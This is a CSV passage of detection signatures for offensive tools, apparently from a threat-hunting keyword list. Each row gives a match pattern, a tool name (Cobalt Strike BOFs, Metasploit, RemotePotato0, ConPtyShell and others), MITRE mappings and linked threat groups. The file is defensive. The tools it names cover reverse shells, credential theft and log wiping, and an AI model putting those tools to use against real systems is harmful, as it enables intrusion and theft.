"*REM getting browser history*",".{0,1000}REM\sgetting\sbrowser\shistory.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","56936"
"*REM Title: Harvester_OF_SORROW*",".{0,1000}REM\sTitle\:\sHarvester_OF_SORROW.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot  to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56937"
"*REM wipe the logs*",".{0,1000}REM\swipe\sthe\slogs.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","56938"
"*-Rem@ov@eDef@ini@tio@ns -@Al@l*",".{0,1000}\-Rem\@ov\@eDef\@ini\@tio\@ns\s\-\@Al\@l.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56939"
"*remiflavien1/recon-archy*",".{0,1000}remiflavien1\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56946"
"*Remote Access.\n\nA wrapper around commands to make agent generation easy4u.*",".{0,1000}Remote\sAccess\.\\n\\nA\swrapper\saround\scommands\sto\smake\sagent\sgeneration\seasy4u\..{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","56948"
"*-remote -destPipe * -pipeHost * -destHost *",".{0,1000}\-remote\s\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-destHost\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","56967"
"*Remote Potato by @decoder_it and @splinter_code*",".{0,1000}Remote\sPotato\sby\s\@decoder_it\sand\s\@splinter_code.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","56968"
"*Remote System - MDE_Enum *",".{0,1000}Remote\sSystem\s\-\sMDE_Enum\s.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","56987"
"*Remote/lastpass/lastpass.x86.*",".{0,1000}Remote\/lastpass\/lastpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56992"
"*Remote/setuserpass/*",".{0,1000}Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56993"
"*Remote/shspawnas*",".{0,1000}Remote\/shspawnas.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56994"
"*Remote/suspendresume/*",".{0,1000}Remote\/suspendresume\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56995"
"*remote_exploit.erb*",".{0,1000}remote_exploit\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56996"
"*remote_exploit_cmd_stager.*",".{0,1000}remote_exploit_cmd_stager\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56997"
"*remote_exploit_demo_template.erb*",".{0,1000}remote_exploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56998"
"*remote_get_tor_exits_list(*",".{0,1000}remote_get_tor_exits_list\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","56999"
"*remote_shell.py*",".{0,1000}remote_shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","57000"
"*-remote=127.0.0.1:3000*",".{0,1000}\-remote\=127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","57001"
"*RemoteDesktopPassView.zip*",".{0,1000}RemoteDesktopPassView\.zip.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","57017"
"*remote-exec *jump *",".{0,1000}remote\-exec\s.{0,1000}jump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57018"
"*RemoteHashRetrieval.ps1*",".{0,1000}RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","57019"
"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*",".{0,1000}\-RemoteIp\s.{0,1000}\s\-RemotePort\s.{0,1000}\s\-Rows\s.{0,1000}\s\-Cols\s.{0,1000}\s\-CommandLine\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","57020"
"*RemoteKrbRelay.exe*",".{0,1000}RemoteKrbRelay\.exe.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","1","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","57025"
"*remote-method-guesser/rmg*",".{0,1000}remote\-method\-guesser\/rmg.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57026"
"*remote-method-guesser-master*",".{0,1000}remote\-method\-guesser\-master.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57027"
"*RemoteNTDLL.cpp*",".{0,1000}RemoteNTDLL\.cpp.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","57028"
"*RemoteNTDLL.exe*",".{0,1000}RemoteNTDLL\.exe.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","57029"
"*remotepipelist *",".{0,1000}remotepipelist\s.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57059"
"*RemotePipeList is x64 only*",".{0,1000}RemotePipeList\sis\sx64\sonly.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57060"
"*RemotePipeList.cna*",".{0,1000}RemotePipeList\.cna.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57061"
"*RemotePipeList.exe*",".{0,1000}RemotePipeList\.exe.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57062"
"*RemotePotato0*@splinter_code & @decoder_it*",".{0,1000}RemotePotato0.{0,1000}\@splinter_code\s\&\s\@decoder_it.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","57063"
"*RemotePotato0.exe*",".{0,1000}RemotePotato0\.exe.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","57064"
"*remotereg.cna*",".{0,1000}remotereg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","57065"
"*RemoteShellCodeInjection-master*",".{0,1000}RemoteShellCodeInjection\-master.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","57067"
"*RemoteShellCodeInjection-master.zip*",".{0,1000}RemoteShellCodeInjection\-master\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","57068"
"*remotewinenum.rb*",".{0,1000}remotewinenum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57069"
